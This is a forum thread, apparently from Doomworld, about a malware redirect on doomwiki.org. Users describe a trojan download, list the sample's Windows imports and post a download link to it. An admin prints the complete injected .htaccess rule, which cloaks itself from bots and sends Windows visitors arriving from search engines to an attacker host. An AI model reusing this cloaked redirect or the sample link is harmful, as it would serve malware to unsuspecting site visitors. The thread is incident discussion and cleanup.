doomwiki has a virus?

Can someone confirm if doomwiki.org is infected?

Yesterday, I went to it via google and noticed a sort of redirection to "bankingonbankers" and java was started up. Did a malware scan follow-up.

I tried to reproduce, but couldn't. However, some guys from a tech support IRC said that when they went to doomwiki.org, there was an attempted download of some google_org_doomwiki.zip

Virustotal indicates it's malware. Maybe there's some malicious script?

You really should run a scan and then check for the same result on other pc's before you start scaring people
I was on the wiki only yesterday and I found nothing :/

Upgrade your Java JRE: there's a recent well-known vulnerability that enables arbitrary code execution through a malicious Java applet. If you see Java starting for no obvious reason on a page that SHOULD'T have it at all, shut down the browser and kill the java process ASAP. I know for sure it affects releases prior to 1.6u29, while 1.7 should be fine.

On the bright side, this method is only used to deliver .exe files, so on Linux even if the download succeeds, it will be asymptomatic.

Where was I before the forums crashed - better not be anything to do with your malware! (JK)

That's not doomwiki.org, it's a fake link. The one I tried (which should have taken me here) is actually a download link for a file called "google_doomwiki.zip" from californiagoldbook.com and contained a variant of the Win32/Kryptic.ZWP trojan (as reported by ESET Smart Security).

Californiagoldbook.com redirects to another site called banknews.com who are flogging an e-book on a third site called californiagoldbookonline.com. I wouldn't be surprised if that e-book's infested with malware.

The moral of the story is - don't take Google links at face value.

I too got a suspicious zip file when trying to follow a link to the wiki from Google. The file downloaded was "google_.zip" and contained a "google_.com". Obviously I didn't run the program, but when I clicked the URL again, it took me straight to the site. Nothing weird happened with Java though...

Here is the link to the file I downloaded if anyone wants to examine it. Please be cautious: http://speedy.sh/tuYKn/google.zip

petePESTILENCE said:

You really should run a scan and then check for the same result on other pc's before you start scaring people
I was on the wiki only yesterday and I found nothing :/

Hi there! Good to see you didn't read my post. I already did scans of my PC and I've asked at a tech support IRC about this. Other people have encountered similar threats there. And no, much to your relief, this isn't a scare tactic.

Is the fake link displayed at the bottom of (whichever) browser when you hover the cursor over it on google? Or does it redirect AFTER clicking on the google result?

Anyway, it seems my Java version is up to date, but it's not 1.7; unless 1.6u31 is AKA 1.7

Soz man....
Just struck me as odd....
Damn Trojan tricksters

I clicked a couple google links to the wiki earlier when the thread was new & didn't have any problems.. just tried it again and got the same malicious redirect as you from 2 different ones, shut down by my browser & antivirus (though i'm gonna do some scans & monitor my processes/network activity closely) but afterwards the links worked properly.

edit: I was in a hurry to sever my connection & make double sure my comp is clean. posted about things I should probably research first.

Did not occur to me at all no matter how many times I tried.

Some info on that google_.com

google_.com: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

* Written with Microsoft Visual C++ 8.0, using C++/CLI.
* It is a GUI Application
* Calls DeleteCriticalSection, EnterCriticalSection, ExitProcess, FindResourceA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetACP, GetCommandLineA, GetCommandLineW, GetCPInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStrings, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoA, GetModuleFileNameA, GetModuleHandleA, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemTimeAsFileTime, GetTickCount, GetVersionExA, HeapAlloc, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSection, InterlockedDecrement, InterlockedIncrement, IsDebuggerPresent, IsValidCodePage, LCMapStringA, LCMapStringW, LeaveCriticalSection, LoadLibraryA, LoadResource, MultiByteToWideChar, QueryPerformanceCounter, RtlUnwind, SetHandleCount, SetLastError, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, WideCharToMultiByte, and WriteFile

could this be due to a compromised .htaccess file at the doomwiki? Thats probably the leading cause of traffic inbound from a search engine being redirected to some circle of hell... but web design & security is mostly voodoo to me, I just work on PCs.

Well, It only happens when you click on the link to doomwiki.org on Google, and it only happens once. And I guess gravager is right.
Whoever is the admin at Doomwiki.org should do a check on the .htaccess since it does that odd redirect.

I've done a Google search on "doom wiki", scrolled down until I found doomwiki.org and not doom. wikia.com, clicked on the link, nothing special happened.

EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid.

well I saw it happen twice, & neither of them was the home page link. one of those pop.- links did it to me (I specifically tried it because it looked suspicious), but if I type the URL into my browser it loads the wiki page. I dunno what that prefix is all about. I avoided the crummy wikia site as well.

EDIT: ok my pop link didn't end with .info, now that smells like a fake. but typing pop.doomwiki.org in a browser just drops the pop & loads the home page for me.

anyway I sent a PM to Quasar earlier. not that I know anyone here but the wiki said he's a maintainer of the server =) he's probably sleeping like normal people though, so if somebody's in direct contact with an admin....

and I guess we can stop testing links to see if we get infected or not. enough lemmings have taken that dive to confirm the rocks down there are nasty.

gravager said:

could this be due to a compromised .htaccess file at the doomwiki?

Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.

printz said:

EDIT: looking for "simon fraggle howard" as GreyGhost suggested, I found some results such as "pop.doomwiki.info". Oopsie. Be afraid, be very afraid.

The Google link I used has disappeared, so maybe it's already being filtered out as a known malware site.

GreyGhost said:

Nothing to do with DoomWiki, it's a fake link that downloads a trojan to your PC, then (maybe, didn't for me) re-directs you to the Wiki.

Maybe your link didn't have a &redirect=no clause in the URL... I'm getting a pop.doomwiki result in the fifth find entry.

well this is just really confusing. if there's fake links, they're really good.

if i google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms.

more experimenting: it does this exactly once, then it keeps bringing me to doomwiki. but i restart my browser (clears all my cookies & cache) and it happens again.

I've got hella slow internet, so I took time to read the messages in the status bar. instead of "sending request to doomwiki.org" it redirects to "sending request to ####.kingoftheaquarium.com", thats 4 varying numbers up front. stopped loading before I received enough data to set off my antivirus. I close the tab and open the same link again, it takes me to Doomwiki. so I'm still thinking it could be the htaccess thing.

Looks to me like it's Google that's infected.

The way it operates, when you click a link, it actually sends you to a redirect. That way, it can count clicks and know which sites are accessed from which queries, and which type of searches you make, and all the rest of the Big Brotherian stuff. Then it uses JavaScript to hide the actual links in the status bar, and replace them with where they then redirect you.

For example, this:

DoomWiki.org, the new home of the Doom Wiki - Doom, Heretic ...
Welcome to the ultimate Doom Wiki, a community-driven project to document
everything related to id Software's classic games Doom and Doom II, as well as ...
doomwiki.org/ - Cached - Similar

The link says http://doomwiki.org/ when you hover over it. If you look at the source of the page, however, you'll see something different:

<li class="g">
 <h3 class="r">
  <a href="/url?q=http://doomwiki.org/&sa=U&
ei=LoRUT_GnM8HW0QXpw7jXBw&ved=0CBAQFjAA&
usg=AFQjCNFPoLR3C0p93WAu3Vxjfe5NuTveVw">
   <b>DoomWiki</b>.<b>org</b>, the new home of the Doom Wiki - Doom, Heretic <b>...</b>
  </a>
 </h3>
 <div class="s">Welcome to the ultimate <b>Doom Wiki</b>, a community-driven project to document <br>
 everything related to id Software's classic games Doom and Doom II, as well as <b>...</b><br>
  <div>
   <cite><b>doomwiki</b>.<b>org</b>/</cite>
   <span class="flc"> - 
    <a href="//webcache.googleusercontent.com/search?sclient=psy-ab&hl=en&site=&
btnK=&q=cache:Q8jS6IXZ_6UJ:http://doomwiki.org/+doomwiki.org&ct=clnk">Cached</a> - 
    <a href="/search?sclient=psy-ab&hl=en&site=&btnK=&tbo=1&
q=related:http://doomwiki.org/+doomwiki.org&sa=X">Similar</a>
   </span>
  </div>
 </div>
</li>

You may be right.

gravager said:

if i google doomwiki.org, the top link is to doomwiki.org, but that link sets off alarms.

more experimenting: it does this exactly once, then it keeps bringing me to doomwiki. but i restart my browser (clears all my cookies & cache) and it happens again.

Oddly enough, the first time I click on any Google link to DoomWiki (after clearing the browser cache and history) I'm taken to the browser's default home page. Not sure what's going on there.

Fortunately I took a screenshot first time around when ESET flagged the trojan, so maybe someone hear can make more sense of the object URL than I have.

Gez said:

Looks to me like it's Google that's infected.

Did someone hack Google? Was it a protest?

EDIT: Does anyone know what malware files are automatically downloaded? I want to see if I have been infected.

Most likely the Russian Mafia seeking to grow their botnets, or Google have unofficially turned evil.

Gez said:

If you look at the source of the page

Soon that will be criminalized in one way or another.

Maes said:

Soon that will be criminalized in one way or another.

No chance, but I'm guessing someone will figure out an efficient way to obscure it.

It's the DoomWiki that has been infected, and it has most likely happened because we are still stuck on the obsolete 1.16.2 version of MediaWiki which is known to have at least one serious exploit.

This code has been injected into the .htaccess file, after about 300 pages of linebreaks:

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.$
RewriteCond %{HTTP_REFERER}     !^.*(imgres\?q).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xjV.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$              http://%{REMOTE_PORT}.kingoftheaquarium.com/url?sa=X&source=web&cd=20&ved=0oHmRGpyT&url=ht$
</IfModule>
#1966ab4f167aa00d6a7a832bb0e5bacd5111a101acd601af7f78bde9

boom! the old linebreak zerg trick.

anyway, speaking of google exploits, I read yesterday they were handing out $20-60k prizes for anyone who can mess with Chrome. I thought that could have backfired somehow... getting attention from the wrong people, etc

Good to know the problem source has been narrowed.

I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rouge anti-virus would get on my computer, but I got it removed.

So yeah, whenever something comes up as a threat, I use a program to scan for any threats and remove them.

Why even bother at all with all this fancy-schmancy java(script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way.

NitroactiveStudios said:

I think some of the advertisements may have viruses, because sometimes when I stay on a page on deviantART, my anti-virus software tells me that something harmful came up, and a rouge anti-virus would get on my computer, but I got it removed.

There are no ads on doomwiki.org.

The mess has been cleaned up, we're updating the source base and developing an action plan to prevent this from happening in the future.

hex11 said:

Why even bother at all with all this fancy-schmancy java(script) stuff anyway? The WWW works just fine with simply HTML+CSS, and no arbitrary code execution vectors. All this needless extra complexity only breeds security holes. KISS - you'll learn this lesson eventually the hard way, or you can learn now the easy way.

Tell me when you write a MediaWiki replacement that runs without any server-side scripting or server-side database, and is served off a vaporware web server that doesn't have server-side configuration files...

that will be a "book" then.